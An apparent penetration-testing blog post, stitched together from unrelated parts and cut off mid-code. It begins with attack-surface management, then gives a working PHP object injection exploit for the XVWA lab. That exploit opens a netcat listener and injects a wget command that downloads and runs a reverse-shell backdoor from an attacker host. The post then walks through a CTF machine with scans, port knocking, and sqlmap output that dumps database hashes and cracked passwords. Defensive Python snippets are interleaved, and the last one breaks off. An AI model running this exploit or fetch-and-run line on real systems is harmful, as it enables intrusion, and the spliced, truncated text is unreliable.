Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.
The first step in the exploitation process is to detect the presence of PHP serialization in the application we are testing. To assist, we can use SuperSerial for Burpsuite which can be downloaded here: https://www.directdefense.com/superserial-java-deserialization-burp-extension/ (see below). This will passively detect the presence of PHP and Java serialization in the application we’re testing.
Analyze
Now that we’ve detected PHP serialization in the application, we can confirm whether remote code execution is possible by analyzing the application's source code (if available…). As seen below, the important thing to note is that the serialized value is taken from the "r" parameter ($var1=unserialize($_REQUEST['r']);) and unserialized; when the result is an instance of PHPObjectInjection, its __wakeup() method eval's the inject property (eval($this->inject);), and arrays are then displayed via (echo "<br/>".$var1[0]." - ".$var1[1];). Given this, code execution appears to be possible if we pass PHP serialized objects to the "r" parameter! 🙂
<?php
error_reporting(E_ALL);

// Deliberately vulnerable (XVWA): unserialize() will instantiate any class
// present in the input, and __wakeup() runs as soon as the object is built.
class PHPObjectInjection{
    public $inject;
    function __construct(){
    }
    function __wakeup(){
        if(isset($this->inject)){
            eval($this->inject);   // attacker-controlled string executed as PHP
        }
    }
}

//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
if(isset($_REQUEST['r'])){
    $var1=unserialize($_REQUEST['r']);   // untrusted request data straight into unserialize()
    if(is_array($var1)){
        echo "<br/>".$var1[0]." - ".$var1[1];
    }
}else{
    echo "parameter is missing";
}
?>
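The detection step above relies on SuperSerial spotting serialized data passively. The following is an added example (not code from the post, XVWA or SuperSerial) of the same check written as a standalone Python scanner that a WAF rule, log review or code-review harness could run over request bodies: it recognises the head of a PHP serialize() value and, more importantly, pulls out every class the value would instantiate, since object instantiation is what triggers __wakeup()/__destruct(). The request bodies in SAMPLES are constructed; the first is the example query string from the XVWA comment.

```python
import re
from urllib.parse import unquote_plus

# Head of a PHP serialize() value. Examples (the first is the XVWA one):
#   a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
#   O:18:"PHPObjectInjection":1:{s:6:"inject";s:9:"echo 'x';";}
PHP_SERIALIZED_HEAD = re.compile(
    r'^(?:N;'                                            # null
    r'|b:[01];'                                          # bool
    r'|i:-?\d+;'                                         # int
    r'|d:-?(?:\d+\.?\d*|INF|NAN)(?:E[+-]?\d+)?;'          # float
    r'|s:\d+:"'                                          # string
    r'|a:\d+:\{'                                         # array
    r'|[OC]:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{)'     # object / Serializable
)
# Every object instantiation anywhere in the value; these are what make
# unserialize() dangerous, because that class's __wakeup()/__destruct() run.
PHP_OBJECT = re.compile(r'O:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')


def parse_form(body: str) -> list:
    """Split a query string or x-www-form-urlencoded body into (name, value)
    pairs. Done by hand so that ';' inside serialized data is never treated
    as a pair separator (older urllib.parse.parse_qsl versions do that)."""
    pairs = []
    for part in body.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(value: str) -> dict:
    """Is this single value PHP-serialized, and which classes would it build?"""
    serialized = bool(PHP_SERIALIZED_HEAD.match(value))
    classes = PHP_OBJECT.findall(value) if serialized else []
    return {"serialized": serialized, "classes": classes}


def scan_form(body: str) -> list:
    """One finding per parameter carrying serialized data. Scalars and arrays
    are 'info' (a telltale that the app feeds input to unserialize());
    anything that instantiates an object is 'high'."""
    findings = []
    for name, value in parse_form(body):
        info = classify_value(value)
        if info["serialized"]:
            severity = "high" if info["classes"] else "info"
            findings.append({"param": name, "severity": severity, **info})
    return findings


# Constructed request bodies for a stand-alone run
SAMPLES = {
    "page_example": 'r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}',
    "object":       'r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:9:"echo \'x\';";}',
    "benign":       'r=hello&page=2',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan_form(body))
```

On the application side the corresponding fix is to stop unserialize() from building objects at all: since PHP 7.0, unserialize($data, ['allowed_classes' => false]) turns every object in the input into __PHP_Incomplete_Class, so no magic method runs; exchanging JSON instead of serialized PHP removes the class of bug entirely.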
Exploit
To exploit this flaw, we can create a simple PHP script to generate our PHP serialized payload automatically and run whatever commands we want on the remote host. In this case, I chose to create a versatile reverse shell via PHP using this script (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz). NOTE: You will need to host this file on your web server and update the local IP and port in the reverse shell script as well as update the below exploit code to point to your server…
<?php
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/
print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

class PHPObjectInjection
{
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
?>
Demo
Now that our exploit is ready, we can execute it to get a nice reverse shell on the remote host for full remote command execution! Shout to @jstnkndy @yappare for the assist! -1N3
# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 282
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.101 00:0c:29:8c:bd:7b 01 042 VMware, Inc.
ENUMERATION
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.
--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds
SSH BANNER
Since our only open port was SSH, I decided to ssh and see what options or hints were available…
As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.
[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3
[email protected]:/pentest/loot# sniper 192.168.1.101
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.
--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.20 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds
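The two sn1per runs above are a small attack-surface change in miniature: the same host exposes one TCP port before the knock and two after it. Tracking that kind of change over time is the core of the continuous ASM idea from the opening paragraph, so here is an added example (not sn1per's code or part of the post) that parses the PORT/STATE/SERVICE/VERSION rows of Nmap normal output and diffs two scans of one host. SCAN_BEFORE and SCAN_AFTER are short excerpts of the two TCP scans shown above; the parser assumes Nmap's normal text output, which is the format the post shows.

```python
import re

# "PORT STATE SERVICE VERSION" rows of Nmap normal output, e.g.
#   22/tcp   open          ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (...)
#   53/udp   open|filtered domain
PORT_ROW = re.compile(r'^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$')


def _port_key(key: str):
    """Sort '22/tcp' before '1337/tcp' numerically, not lexically."""
    return (int(key.split("/")[0]), key)


def parse_nmap_ports(text: str) -> dict:
    """Map 'port/proto' -> {state, service, version} from Nmap normal output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_ROW.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports[f"{port}/{proto}"] = {
                "state": state,
                "service": service,
                "version": (version or "").strip(),
            }
    return ports


def open_ports(text: str) -> list:
    """Only ports Nmap reports as plainly 'open' (not 'open|filtered')."""
    return sorted((k for k, v in parse_nmap_ports(text).items() if v["state"] == "open"),
                  key=_port_key)


def diff_scans(before: str, after: str) -> dict:
    """What appeared, disappeared, or changed (state/service/version)
    between two scans of the same host."""
    b, a = parse_nmap_ports(before), parse_nmap_ports(after)
    return {
        "new": sorted((k for k in a if k not in b), key=_port_key),
        "gone": sorted((k for k in b if k not in a), key=_port_key),
        "changed": sorted((k for k in a if k in b and a[k] != b[k]), key=_port_key),
    }


# Excerpts of the two TCP scans in the post (before and after the knock)
SCAN_BEFORE = """\
Nmap scan report for 192.168.1.101
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
"""
SCAN_AFTER = """\
Nmap scan report for 192.168.1.101
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
"""

if __name__ == "__main__":
    print(diff_scans(SCAN_BEFORE, SCAN_AFTER))
```

For a real pipeline, feed Nmap's XML output (-oX) to a proper parser rather than scraping the human-readable text; the diff logic stays the same, and an alert on anything in "new" or "changed" is the check that catches a service appearing on the perimeter between scheduled scans.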
INTERESTING RESPONSE
Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 page.
It seemed strange to have an encoded message in the HTML comments of the 404 page, so I knew this was a hint that could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string.
Now that we have decoded a message that seems to reveal a hidden login page, the next obvious step was to try some form of SQLi, auth bypass or brute force to get further…
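Encoded strings left in HTML comments are a common way for hints, paths and occasionally credentials to leak from error pages. As an added example (not code from the post), the following Python audits a response body for comments that decode through one or more base64 layers, which is exactly the double-encoded case above; it stops peeling when the result no longer looks like base64. The 404 page and the hint text in it are constructed here because the post does not reproduce the original comment.

```python
import base64
import binascii
import re

COMMENT = re.compile(r'<!--(.*?)-->', re.S)
B64_ALPHABET = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def try_base64(s: str):
    """Decode one base64 layer if s looks like base64 and yields UTF-8 text."""
    s = s.strip()
    if len(s) < 8 or len(s) % 4 or not B64_ALPHABET.match(s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_layers(s: str, max_depth: int = 5) -> list:
    """Peel base64 until the text stops being base64; returns every layer,
    raw text first, fully decoded text last."""
    layers = [s.strip()]
    while len(layers) <= max_depth:
        nxt = try_base64(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def audit_comments(html: str) -> list:
    """Report HTML comments that hide encoded text, with depth and plaintext."""
    findings = []
    for body in COMMENT.findall(html):
        layers = decode_layers(body)
        if len(layers) > 1:
            findings.append({"raw": layers[0], "depth": len(layers) - 1, "decoded": layers[-1]})
    return findings


# Constructed 404 page: the hint is base64 applied twice, as in the post
HINT = "the login page lives at /constructed-hidden-path/"
ONCE = base64.b64encode(HINT.encode()).decode()
TWICE = base64.b64encode(ONCE.encode()).decode()
SAMPLE_404 = f"""<html><body>
<h1>404 Not Found</h1>
<!-- {TWICE} -->
<!-- plain developer note, nothing encoded -->
</body></html>"""

if __name__ == "__main__":
    for finding in audit_comments(SAMPLE_404):
        print(finding["depth"], "layer(s):", finding["decoded"])
```

Run the same audit over your own error pages and templates before release; the mitigation is simply not to ship comments that carry anything an attacker would want to read, encoded or not.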
POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
username=user&password=pass&submit=+Login+
HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html
<!DOCTYPE html>
<html>
<head>
<title>LOTR Login!</title>
</head>
<body>
<div id="main">
<h1>Welcome to the Gates of Mordor</h1>
<div id="login">
<form action="" method="post">
<label>User :</label>
<input id="name" name="username" placeholder="username" type="text"><br>
<label>Password :</label>
<input id="password" name="password" placeholder="**********" type="password">
<br>
<input name="submit" type="submit" value=" Login ">
<span>Username or Password is invalid</span>
</form>
</div>
</div>
</body>
</html>
SQL INJECTION VULNERABILITY
Scanning with Burpsuite quickly revealed that the login form was vulnerable to SQL injection.
SQL INJECTION EXPLOITATION
Using SQLMap, we can dig into the DB and see what else we can find.
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:48
[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'
[*] shutting down at 19:13:04
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:14:15
[19:14:16] [INFO] resuming back-end DBMS 'mysql'
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner: '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: [email protected]
current user: '[email protected]'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database: 'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname: 'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA: True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'
[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
clear-text password: darkshadow
[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+
[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'
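sqlmap's finding reduces to one thing: the login handler splices the username into the SQL text, so the quote in the probe changes the statement. The added example below (not the target's PHP or any of the post's code) shows the flaw beside its fix in Python. SQLite stands in for the target's MySQL, and the two Users rows are taken from the dump above. Because SQLite has no SLEEP() function, the time-based probe sqlmap reported makes the concatenating version fail at prepare time with "no such function", which proves the input reached the SQL parser as code; the parameterised version compares it as a literal and just returns no match.

```python
import sqlite3

# SQLite stands in for the target's MySQL. The rows are from the Webapp.Users
# dump in the post (stored there in clear text, which is its own finding).
def make_db() -> sqlite3.Connection:
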